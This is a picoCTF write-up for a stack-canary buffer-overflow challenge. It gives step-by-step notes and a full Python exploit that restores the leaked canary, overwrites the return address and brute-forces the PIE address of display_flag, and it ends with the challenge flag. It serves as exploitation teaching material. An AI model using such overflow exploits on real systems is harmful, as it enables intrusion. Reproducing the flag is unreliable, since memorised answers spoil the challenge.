CanaRy
Challenge description: This time we added a canary to detect buffer overflows. Can you still find a way to retrieve the flag from this program located in /problems/canary_2_dffbf795b4788666d54a993a5e41d145. Source.
1. `BUF_SIZE` is 32 bytes, so the payload starts with `'a'*32` to fill the buffer; the canary is the next thing on the stack after it.
2. Leak the canary by running the binary on the shell server, then paste the canary value into line 13 of the exploit script.
3. The padding between the canary and the saved return address was found with pwntools' `cyclic()` and `cyclic_find()`: run `python2 -c "from pwn import *; print 'a'*32 + 'ex;Y' + cyclic(100)" | ./vuln` locally (`ex;Y` is the leaked canary), feed the crashing address to `cyclic_find()`, and the offset comes out as 16, so the padding after the canary is `'a'*16`.
4. The binary is PIE, so only the last 1.5 bytes (the low 12 bits) of `display_flag` are fixed; read them from `readelf -s vuln`.
5. The first byte was found with gdb: place a breakpoint on `vuln` and run, which prints `Breakpoint 1, 0x56622a14 in main ()`, and the leading byte `0x56` is what matters. Note that gdb runs the target with ASLR disabled, so this is a guess that the randomized PIE base on the shell server keeps the same leading byte; if it did not, the search space would be larger than the 12 bits brute-forced below.
6. Nested loops over every possible value of the remaining 1.5 bytes (0x000 to 0xfff) brute-force the address, and `p32` from pwntools packs each candidate into little-endian.
7. Run it on the shell server: in a Python terminal, run `from pwn import *`, paste in the `bruteforce_pie` function, then run `print bruteforce_pie()`. The flag appears after a few minutes.
8. If the flag does not appear after the script finishes, run it again and it will work (the script never tries addresses that contain a zero byte).
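The `bruteforce_pie` function itself is not shown on this page, so the following is an added example reconstructing the payload construction and address brute force from the steps above, not the author's script. It is Python 3 and uses `struct.pack("<I", ...)` in place of pwntools' `p32`. The 32-byte buffer, the `ex;Y` canary and the 16-byte padding are taken from the writeup; the low 12 bits of `display_flag` (`LOW12`) are a hypothetical placeholder, since the page does not print the `readelf -s` output, and would be replaced with the real value. Any interaction the binary needs beyond the raw payload (prompts, a length field) is not described on the page, so the function that actually sends a payload is supplied by the caller; a constructed stand-in target is included so the loop can be exercised offline.

```python
import struct

# Layout from the writeup: 32-byte buffer, 4-byte canary, 16 bytes of padding,
# then the saved return address.
BUF_SIZE = 32
CANARY = b"ex;Y"            # canary value used in the writeup's test command
PAD_AFTER_CANARY = 16       # offset found with cyclic_find() in the writeup
HIGH_BYTE = 0x56            # leading byte of the PIE address observed in gdb
LOW12 = 0x7ad               # HYPOTHETICAL: low 12 bits of display_flag from readelf -s


def p32(value):
    """Little-endian 32-bit pack, the same thing pwntools' p32() does."""
    return struct.pack("<I", value)


def build_payload(ret_addr):
    """Fill the buffer, restore the canary, pad to the return address, overwrite it."""
    return b"a" * BUF_SIZE + CANARY + b"a" * PAD_AFTER_CANARY + p32(ret_addr)


def candidate_addresses(high_byte=HIGH_BYTE, low12=LOW12):
    """Every address with the known top byte and low 12 bits; the 12 bits in
    between are unknown, so 0x000..0xfff are enumerated. Addresses containing
    a zero byte are skipped, as in the writeup's script."""
    for mid in range(0x1000):
        addr = (high_byte << 24) | (mid << 12) | low12
        if b"\x00" in p32(addr):
            continue
        yield addr


def bruteforce_pie(send_payload, flag_marker=b"picoCTF{"):
    """Try each candidate until the program's output contains the flag marker.
    send_payload(bytes) -> bytes runs one fresh instance of the target."""
    for addr in candidate_addresses():
        output = send_payload(build_payload(addr))
        if flag_marker in output:
            return addr, output
    return None


def make_fake_target(true_addr, flag=b"picoCTF{constructed_demo_flag}"):
    """Constructed stand-in for ./vuln: checks the canary and 'returns' to the
    supplied address. Unlike the real PIE binary, its address never changes."""
    ret_off = BUF_SIZE + len(CANARY) + PAD_AFTER_CANARY

    def send_payload(payload):
        if payload[BUF_SIZE:BUF_SIZE + len(CANARY)] != CANARY:
            return b"canary corrupt (constructed message)\n"
        (ret,) = struct.unpack("<I", payload[ret_off:ret_off + 4])
        return flag if ret == true_addr else b"crash (constructed message)\n"

    return send_payload


if __name__ == "__main__":
    import subprocess

    def send_to_vuln(payload):
        # Each attempt is a new process, so the PIE base is re-randomized each time.
        proc = subprocess.run(["./vuln"], input=payload,
                              stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        return proc.stdout

    print(bruteforce_pie(send_to_vuln))
```

Against the real binary every attempt starts a fresh process with a fresh PIE base, so the loop is probabilistic rather than exhaustive: it succeeds when some attempt's guess matches that process's layout, which is why a run can finish empty and a rerun can succeed. The fake target also shows the zero-byte edge case from step 8: if the true address contains a `\x00`, `candidate_addresses()` never produces it and `bruteforce_pie` returns `None`.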
picoCTF{cAnAr135_mU5t_b3_r4nd0m!_1df5fde9}